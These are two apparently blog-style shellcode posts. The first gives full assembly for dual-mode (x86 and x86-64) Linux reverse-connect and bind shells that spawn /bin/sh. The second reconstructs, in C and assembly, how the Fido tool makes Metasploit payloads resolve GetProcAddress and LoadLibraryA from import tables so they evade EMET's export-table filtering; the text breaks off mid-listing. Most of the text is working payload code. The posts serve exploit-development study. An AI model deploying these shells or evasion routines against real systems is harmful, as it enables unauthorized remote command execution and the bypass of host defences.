Shellcode: Dual Mode (x86 + x86-64) Linux shellcode

Introduction

Someone recently asked me what I mean by “dual mode shellcode”. The wording seems slightly ambiguous to those unfamiliar with the different operating modes of a CPU like the x86, so I just wanted to clarify it through some code written for Linux.

All “dual mode” means is that the shellcode will run successfully in either legacy mode (32-bit) or long mode (64-bit) and that’s it.

You can’t really call them multiplatform because they only run on Linux and you can’t call them multi-architecture because they only run on the x86 cpu.

So I propose calling them “dual mode” or x84 but feel free to call ’em whatever you want.

They work by exploiting x86 REX prefixes like the dual mode code for windows shown here

x86-64 Linux shellcodes were documented last year and here are some dual mode versions.

The sources below are using 32-bit instructions to provide some clarity but will also run successfully in 64-bit mode.

Execute /bin/sh

sh

Reverse Connect Shellcode

; 128 byte reverse connect shell
;
; Tested on 32 and 64-bit versions of Linux
;
; Assembled as 32-bit code; the same bytes are meant to run in 64-bit mode.
; The one-byte "dec eax" / "inc eax" opcodes decode as REX prefixes in
; 64-bit mode and leave the flags untouched there, so the jnz that follows
; each of them separates the x86 path (int 0x80) from the x64 path (syscall).
;
; NOTE(review): every "mov al, n" relies on the upper 24 bits of eax being
; zero, i.e. on the previous call having returned a small non-negative value.

    bits    32
    
    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = inet_addr("127.0.0.1");
    ; sa.sin_port   = htons(1234);
    ; both constants are stored inverted and restored with NOT
    ; (presumably to keep null bytes out of the encoding)
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x0100007f & 0xFFFFFFFF 
    not     eax         ; eax = sin_port : sin_family
    not     ebx         ; ebx = sin_addr
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi         ; edi = &sa
    stosd               ; store sin_family and sin_port
    xchg    eax, ebx
    stosd               ; store sin_addr
    push    esp         ; &sa
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0, ZF = 1
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall + 1 (x86 decrements it below)
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax         ; x86: eax = 102, ZF = 0 | x64: prefix byte, ZF stays 1
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi = s (eax = 2)
    xchg    eax, esi    ; esi = 2 (eax = 1)
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)
x64_dup2:
    mov     al, 33      ; rax = sys_dup2
    syscall
    ; watch out for that bug: "dec esi" cannot be used here because its
    ; one-byte encoding would be read as a prefix in 64-bit mode
    sub     esi, 1
    jns     x64_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (s, &sa, sizeof(sa));
    pop     esi         ; rsi = &sa
    mov     dl, 16      ; rdx = sizeof(sa)
    mov     al, 42      ; rax = sys_connect
    syscall    
    jmp     x84_execve

x86_socket:
    pop     ebp         ; ebp = &sa
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, ebx    ; ebx = s (eax = 1)
    
    ; step 2, assign socket to stdin, stdout, stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)    
    pop     ecx         ; ecx = 2 (the AF_INET value pushed above)
x86_dup2:
    mov     al, 63      ; eax = sys_dup2
    int     0x80 
    dec     ecx
    jns     x86_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; socketcall (SYS_CONNECT, {s, &sa, sizeof(sa)});
    push    16          ; sizeof(sa) 
    push    ebp         ; &sa
    push    ebx         ; s
    push    esp
    pop     ecx         ; &args
    push    3
    pop     ebx         ; ebx = SYS_CONNECT
    mov     al, 102     ; eax = sys_socketcall    
    int     0x80
    
    ; execve("/bin//sh", NULL, NULL);
    ; both paths arrive here; eax is expected to be 0 (connect succeeded)
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL (x64), also sets ZF = 1 for the test below
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax         ; x86: eax = 1, ZF = 0 | x64: prefix byte, ZF stays 1
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Bind Shellcode

; 158 byte bind shell (156 bytes + 2 for the corrected dup2 start value)
;
; The original 156 byte version was tested on 32 and 64-bit versions of
; Linux; re-test after assembling this revision.
;
; Assembled as 32-bit code; the same bytes are meant to run in 64-bit mode.
; The one-byte "dec eax" / "inc eax" opcodes decode as REX prefixes in
; 64-bit mode and leave the flags untouched there, so the jnz that follows
; each of them separates the x86 path (int 0x80) from the x64 path (syscall).
;
; NOTE(review): every "mov al, n" relies on the upper 24 bits of eax being
; zero, i.e. on descriptors and return values being small and non-negative.

    bits 32

    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = INADDR_ANY;
    ; sa.sin_port   = htons(1234);
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x00000000 & 0xFFFFFFFF 
    not     eax         ; eax = sin_port : sin_family
    not     ebx         ; ebx = sin_addr
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi         ; edi = &sa
    stosd               ; store sin_family and sin_port
    xchg    eax, ebx
    stosd               ; store sin_addr
    push    esp         ; &sa
    pop     ebp         ; ebp = &sa for both paths
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0, ZF = 1
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall + 1 (x86 decrements it below)
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax         ; x86: eax = 102, ZF = 0 | x64: prefix byte, ZF stays 1
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi=s (eax = 2)
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    ebp
    pop     esi         ; rsi = &sa
    mov     dl, 16      ; rdx = sizeof(sa)
    mov     al, 49      ; rax = sys_bind
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    eax
    pop     esi         ; rsi = 0 (bind is expected to have returned 0)
    mov     al, 50      ; rax = sys_listen
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    ; rsi is still 0, so no peer address is requested (rdx still holds 16;
    ; presumably ignored when the address pointer is NULL)
    mov     al, 43      ; rax = sys_accept
    syscall
    
    xchg    eax, edi         ; edi=r (accepted socket), eax=s
    ; The previous "xchg eax, esi" loaded esi with s, not 2, so the loop
    ; below started at whatever descriptor number the listener had.
    push    2
    pop     esi              ; esi=2 (STDERR_FILENO)
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, fileno);
dup_loop64:
    mov     al, 33               ; rax=sys_dup2
    syscall
    ; "dec esi" cannot be used: its one-byte encoding would be read as a
    ; prefix in 64-bit mode
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    jmp     x84_execve
    
x86_socket:
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, edi    ; edi = s (eax = 2)

    ; step 2, bind to port 1234
    ; bind (s, &sa, sizeof(sa))
    pop    ebx               ; ebx=2, sys_bind
    pop    esi               ; esi=1
    push   0x10              ; sizeof(sa)
    push   ebp               ; &sa
    push   edi               ; s
    mov    al, 0x66          ; eax=sys_socketcall
    mov    ecx, esp          ; ecx=&args
    int    0x80
    
    mov    [ecx+4], edx      ; clear sa from args, leaving {s, 0, 16}
    
    ; step 3, listen for incoming connections
    ; listen (s, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    mov    bl, 4             ; ebx=sys_listen
    int    0x80
    
    ; step 4, accept connections
    ; accept (s, 0, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    inc    ebx               ; ebx=sys_accept
    int    0x80
    
    ; step 5, assign socket to stdin, stdout and stderr
    ; dup2(s, FILENO_STDIN); 
    ; dup2(s, FILENO_STDOUT); 
    ; dup2(s, FILENO_STDERR); 
    push   2
    pop    ecx               ; ecx=2
    xchg   ebx, eax          ; ebx=accepted socket (eax = 5)
dup_loop:
    mov    al, 0x3f           ; eax=sys_dup2
    int    0x80
    dec    ecx
    jns    dup_loop

    ; execve("/bin//sh", NULL, NULL);
    ; both paths arrive here with eax = 0 after the final dup2(r, 0)
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL (x64), also sets ZF = 1 for the test below
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax         ; x86: eax = 1, ZF = 0 | x64: prefix byte, ZF stays 1
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Summary

I’ve uploaded the code to exploit-db in the event my blog goes offline for any reason. The sources are also in a GitHub repo here

Posted in assembly, linux, programming, security, shellcode | Tagged , , , , , | Leave a comment

Shellcode: Fido and how it resolves GetProcAddress and LoadLibraryA

Introduction

A tool to modify existing metasploit payloads for windows called Fido was recently published by Joshua Pitts, the author of Backdoor Factory.

Fido will strip this assembly code responsible for resolving API addresses in the export directory and replace it with 1 of 4 methods that obtain GetProcAddress and LoadLibraryA from the Import directory.

The upgrade enables existing payloads from Metasploit to bypass Enhanced Mitigation Experience Toolkit (EMET) which for those of you who don’t know defends against memory corruption vulnerabilities on legacy systems that do not support Control Flow Guard (CFG)

Due to the Export Address Table (EAT) Access Filtering (EAF) feature in EMET and overall popularity of Metasploit payloads for exploiting vulnerabilities, detection is not difficult hence the motivation behind writing Fido.

As Joshua points out in his presentation, EMET will reach end of life (EOL) on July 31st 2018, by which time Microsoft probably expects most applications to be protected by CFG which is a much more advanced protection against memory corruption vulnerabilities.

Perhaps it’s optimistic to expect that developers will migrate to MSVC 2015 just to benefit from CFG, but only time will tell.

Here, I’ve recreated in C and x86 assembly the ideas presented by Joshua, mainly to understand what the Fido assembly code does and also to try to optimize the examples to be more compact.

Some of the code shown here is derived from IAT code shown in Resolving API addresses in memory but won’t use hashes except for the last 2 when searching for external DLL.

So there are 4 options provided by the Fido tool:

Type Description
GPA GPA is in targetbinary IAT (default)
LLAGPA LoadlibraryA(LLA)/GPA is in the targetbinary IAT (smallest shellcode option)
Extern GPA need DLLName or targetbinary to use
Extern LLAGPA need DLLName or targetbinary to use

So let’s examine each approach with both C and assembly code.

GPA

If the executable image being exploited imports GetProcAddress already, we just need to access the address from kernel32.dll which should be in the Import Address Table (IAT).

A bit of trivia for you: Locating GetProcAddress in IAT was used in a Win32 computer virus called Cabanas by Jacky Qwerty/29A… published 20 years ago!

get_proc_address

gpa.c here

// locate kernel32.dll among the import descriptors of the image at base
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    // OR with 0x20202020 lowercases the first 8 characters of the DLL name
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress
      rva   = imp->OriginalFirstThunk;
      oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
      
      rva   = imp->FirstThunk;
      ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
        
      for (gpa=NULL;; oft++, ft++) 
      {
        rva  = oft->u1.AddressOfData;
        // a zero entry terminates the thunk array
        if (rva == 0) break;
        // imports by ordinal carry no name to compare, skip them
        if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
        
        ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
        name = (PDWORD)ibn->Name;
        
        // is this GetProcAddress? ("GetP" at +0 and "ddre" at +8)
        if (name[0] == 'PteG' && name[2] == 'erdd') {
          gpa = (LPVOID)ft->u1.Function;
          break;
        }
      }
      // no need to look at further descriptors once it has been found
      if (gpa != NULL) break;
    }
  }

The assembly code doesn’t have any bounds checking although it would be trivial enough to enable. We only check for ordinals and skip those to avoid crashing during the compare for GetProcAddress string.

The DLL name is converted to lowercase using 0x20202020 which may or may not be required. It assumes GetProcAddress is imported by the executable module and that it’s imported from kernel32.dll.

; Walks the import directory of the main executable image until the
; kernel32 descriptor is found, then walks its thunk arrays until the
; import named GetProcAddress is found.
;
; returns pointer to GetProcAddress in ebp
;
; esi, edi and ebx are preserved; eax and edx are overwritten.
; Neither loop has a terminator check, so the routine only comes back
; when the image really imports GetProcAddress from kernel32.dll.
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx
    mov    ebx, [fs:edx]      ; ebx = peb
    mov    ebx, [ebx+08h]     ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]     ; edx += e_lfanew
    ; edx = e_lfanew + 30h, so +50h reads offset 80h of the NT headers:
    ; the RVA of the import directory
    mov    esi, [ebx+edx+50h]
    add    esi, ebx           ; esi = first import descriptor
imp_l0:
    ; read one 20-byte descriptor; esi ends up on the next one
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]   ; first 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0           ; get next DLL if not equal
    
    mov    eax, [edx+ebx+4] ; next 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0           ; get next DLL if not equal
    
    lea    esi, [ebp+ebx]   ; esi = OriginalFirstThunk
    add    edi, ebx         ; edi = FirstThunk
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals (high bit set)
    
    ; +2 skips the 2 bytes in front of the name in the import-by-name entry
    cmp    dword[eax+ebx+2], 'GetP'
    jnz    imp_l1
    
    ; +10 = name bytes 8..11, the same dword the C code reads as name[2]
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    ; edi was already advanced by scasd, so the matching slot is at edi-4
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

LLAGPA

The next bit of code resolves address of both LoadLibraryA and GetProcAddress from kernel32.dll assuming the image imports both.

llagpa.c here

// Search one import descriptor for an API imported by name.
//
//   imp  : import descriptor whose thunk arrays are searched
//   base : load address of the image that owns the descriptor
//   api  : null terminated ASCII name of the API (passed as PDWORD)
//
// Returns the address stored in the matching FirstThunk slot, or NULL
// when the descriptor does not import the API by name.
LPVOID get_imp(PIMAGE_IMPORT_DESCRIPTOR imp, 
    LPVOID base, PDWORD api)
{
  const char              *have, *want;
  LPVOID                   api_adr = NULL;  // stays NULL when nothing matches
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  DWORD                    rva;
  
  rva   = imp->OriginalFirstThunk;
  oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
  
  rva   = imp->FirstThunk;
  ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
    
  for (;; oft++, ft++) 
  {
    // no API left?
    if (oft->u1.AddressOfData==0) break;
    // skip ordinals
    if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
    
    rva  = oft->u1.AddressOfData;
    ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
    
    // Compare the complete names. Checking only the first 8 bytes would
    // let "LoadLibraryA" match LoadLibraryW, LoadLibraryExA and
    // LoadLibraryExW as well, whichever is listed first.
    have = (const char*)ibn->Name;
    want = (const char*)api;
    while (*have != 0 && *have == *want) {
      have++;
      want++;
    }
    
    // have we a match? (both strings ended at the same position)
    if (*have == *want) {
      api_adr = (LPVOID)ft->u1.Function;
      break;
    }
  }
  return api_adr;  
}

Then the code which calls get_imp()

// locate kernel32.dll
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress and LoadLibraryA
      lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
      gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
      break;
    }
  }

As before with previous GPA code, there is no bounds checking. It assumes both the API are imported from kernel32.dll

; Finds the kernel32 import descriptor of the main executable image and
; resolves two of its imports with get_imp.
;
; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress
;
; esi and edi are preserved; eax, ecx and edx are overwritten.
; There is no terminator check in either search loop.

    push   esi
    push   edi
    
    push   30h
    pop    edx
    
    mov    ebx, [fs:edx]     ; ebx = peb
    mov    ebx, [ebx+08h]    ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]    ; edx += e_lfanew
    ; edx = e_lfanew + 30h, so +50h reads offset 80h of the NT headers:
    ; the RVA of the import directory
    mov    esi, [ebx+edx+50h]
    add    esi, ebx          ; esi = first import descriptor
imp_l0:
    ; read one 20-byte descriptor; esi ends up on the next one
    lodsd                    ; OriginalFirstThunk +00h
    xchg   eax, ebp          ; store in ebp
    lodsd                    ; TimeDateStamp      +04h
    lodsd                    ; ForwarderChain     +08h
    lodsd                    ; Name               +0Ch
    xchg   eax, edx          ; store in edx
    lodsd                    ; FirstThunk         +10h 
    xchg   eax, edi          ; store in edi
    
    mov    eax, [edx+ebx]    ; first 4 characters of the DLL name
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]  ; next 4 characters of the DLL name
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
    
    ; locate GetProcAddress
    mov    ecx, 'GetP'       ; name bytes 0..3
    mov    edx, 'ddre'       ; name bytes 8..11
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'       ; name bytes 0..3
    mov    edx, 'aryA'       ; name bytes 8..11
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

; get_imp
;   in : ebx = image base
;        ebp = OriginalFirstThunk RVA, edi = FirstThunk RVA
;        ecx = name bytes 0..3, edx = name bytes 8..11 of the wanted API
;   out: eax = value of the matching FirstThunk slot
;   esi and edi are restored, so the routine can be called again with the
;   same descriptor.
get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    js     gi_l0              ; skip ordinals (high bit set)
    
    ; +2 skips the 2 bytes in front of the name in the import-by-name entry
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    ; edi was already advanced by scasd, so the matching slot is at edi-4
    mov    eax, [edi-4]       ; eax = ft->u1.Function
    ; NOTE(review): nothing in this listing jumps to gi_l1
gi_l1: 
    pop    edi
    pop    esi
    ret

Extern GPA

If the executable doesn’t import GetProcAddress, we obtain it from a DLL that does.
The main difference is that we locate the DLL by hash in the PEB and then search through its imports. Here, I’m using ADVAPI32.DLL as example although you would presumably check what DLL the executable imports API from.

extern_gpa.c here

// for each DLL loaded (stops as soon as gpa has been resolved)
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL
    dll = dte->BaseDllName.Buffer;

    // Length is in bytes, the name is made of 16-bit characters
    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    
    // is this our target DLL?
    if (hash == DLL_HASH) 
    {      
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
  
      // locate kernel32.dll
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {
          // locate GetProcAddress
          rva = imp->OriginalFirstThunk;
          oft = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
          
          rva = imp->FirstThunk;
          ft  = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
            
          for (;; oft++, ft++) 
          {
            rva = oft->u1.AddressOfData;
            // a zero entry terminates the thunk array
            if (rva==0) break;
            // imports by ordinal carry no name to compare, skip them
            // (the assembly version does the same)
            if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
            
            ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
            name = (PDWORD)ibn->Name;
            
            // is this GetProcAddress? ("GetP" at +0 and "ddre" at +8)
            if (name[0] == 'PteG' && name[2] == 'erdd') {
              gpa = (LPVOID)ft->u1.Function;
              break;
            }
          }
          // no need to look at further descriptors once it has been found
          if (gpa != NULL) break;
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress

If either of the conditions above isn’t true, this code will crash. I’m using the following macro for YASM/NASM to calculate the hash of a string and compare it with the result in edx.

; macro that hashes a string at assembly time and emits "cmp edx, hash"
;
; Each character is ORed with 0x20 (lowercase) and added to the hash after
; the hash has been rotated right by 13 bits, the same steps the run-time
; loop performs on the module name before this macro is used.
;   %1 = string to hash
%macro cmpms 1.nolist
  %assign %%h 0  
  %strlen %%len %1
  %assign %%i 1
  
  %rep %%len
    %substr %%c %1 %%i
    ; rotate right by 13; bits above 31 are masked off after the add below
    %assign %%h ((%%h >> 13) & 0FFFFFFFFh) | (%%h << (32-13))
    %assign %%c (%%c | 0x20)    
    %assign %%h ((%%h + %%c) & 0FFFFFFFFh)
    %assign %%i (%%i+1)
  %endrep
  ; cmp edx, hash
  db 081h, 0fah
  dd %%h
%endmacro
; Finds a loaded DLL by the hash of its name, then searches that DLL's
; kernel32 import descriptor for GetProcAddress.
;
; returns pointer to GetProcAddress in ebp
;
; esi, edi and ebx are preserved; eax, ecx and edx are overwritten.
; None of the loops has a terminator check.
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; esi = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; esi = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:    
    ; advance before hashing, so the first list entry is never examined
    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink    
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    ; NOTE(review): nothing in this listing jumps to gapi_l1
gapi_l1:
    push   edx                ; keep 30h, edx is the hash accumulator below
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1             ; length in bytes -> number of 16-bit characters
    xor    eax, eax
    cdq                       ; edx = 0, initial hash
gapi_l2:
    lodsw                     ; next character of the name
    or     al, 0x20           ; convert to lowercase
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx                ; restore 30h; pop leaves the flags of the cmp intact
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    ; edx = e_lfanew + 30h, so +50h reads offset 80h of the NT headers:
    ; the RVA of the import directory
    mov    esi, [ebx+edx+50h]
    add    esi, ebx         ; esi = first import descriptor
imp_l0:
    ; read one 20-byte descriptor; esi ends up on the next one
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]   ; first 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4] ; next 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; we have it, locate GetProcAddress
    lea    esi, [ebp+ebx]   ; esi = OriginalFirstThunk + base
    add    edi, ebx         ; edi = FirstThunk + base
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals (high bit set)
    
    ; +2 skips the 2 bytes in front of the name in the import-by-name entry
    cmp    dword[eax+ebx+ 2], 'GetP'
    jnz    imp_l1
    
    ; +10 = name bytes 8..11, the same dword the C code reads as name[2]
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    ; edi was already advanced by scasd, so the matching slot is at edi-4
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

Extern LLAGPA

If the executable doesn’t import GetProcAddress and LoadLibraryA, we obtain it from a DLL that does.

extern_llagpa.c here

// for each DLL in PEB
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL name
    dll = dte->BaseDllName.Buffer;

    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    // is this the target DLL?
    if (hash == DLL_HASH)
    {
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
    
      // locate kernel32.dll descriptor
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {        
          // locate GetProcAddress and LoadLibraryA
          lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
          gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
          break;
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress
  3. ADVAPI32.DLL imports LoadLibraryA
; Finds a loaded DLL by the hash of its name, then resolves two imports
; of that DLL's kernel32 import descriptor with get_imp.
;
; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress
;
; esi and edi are preserved; eax, ecx and edx are overwritten.
    push   esi
    push   edi
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; esi = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; esi = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:
    ; advance before hashing, so the first list entry is never examined
